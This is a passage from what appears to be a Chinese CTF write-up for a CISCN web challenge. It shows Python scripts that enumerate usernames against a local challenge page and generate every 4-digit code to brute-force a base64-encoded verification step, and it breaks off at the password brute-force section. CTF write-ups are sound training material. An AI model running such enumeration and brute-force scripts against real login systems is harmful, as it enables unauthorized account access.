部分题目下载地址,有的不完整 : 点我点我

web 1

  • 考点 : 无参函数的 RCE

  • 在注释中发现了 forgetpassword.php 页面

  • 打开 forgetpassword.php,要求输入一个用户名,尝试用户名爆破,结果为 admin123

    import requests
    
    url = "http://127.0.0.1/ciscn/web1/useri.php"
    
    response = "没有这个用户"
    
    f = open("./username.txt", "r", encoding="utf-8")
    
    for line in f:
      line = line.strip()
    
      data = {
          "user_name" : line,
      }
    
      r = requests.post(url=url, data=data)
    
      if response in r.text:
          continue
      else:
          print(line)
          break
    
  • 输入 admin123 之后跳转到 useryzm.php 页面

  • 提示验证码经过 base64 加密,而且验证码是 4 位的数字,写脚本爆破一下,结果验证码为 MTQyMw==

    四位数字生成

    for i in range(0,10000):
      s = str(i).zfill(4)
      print(s)
      f = open("num.txt",'a')
      f.write(s)
      f.write('\n')   #实现换行的功能
    

    爆破密码

    ```python

点击收藏 | 0 关注 | 2
登录 后跟帖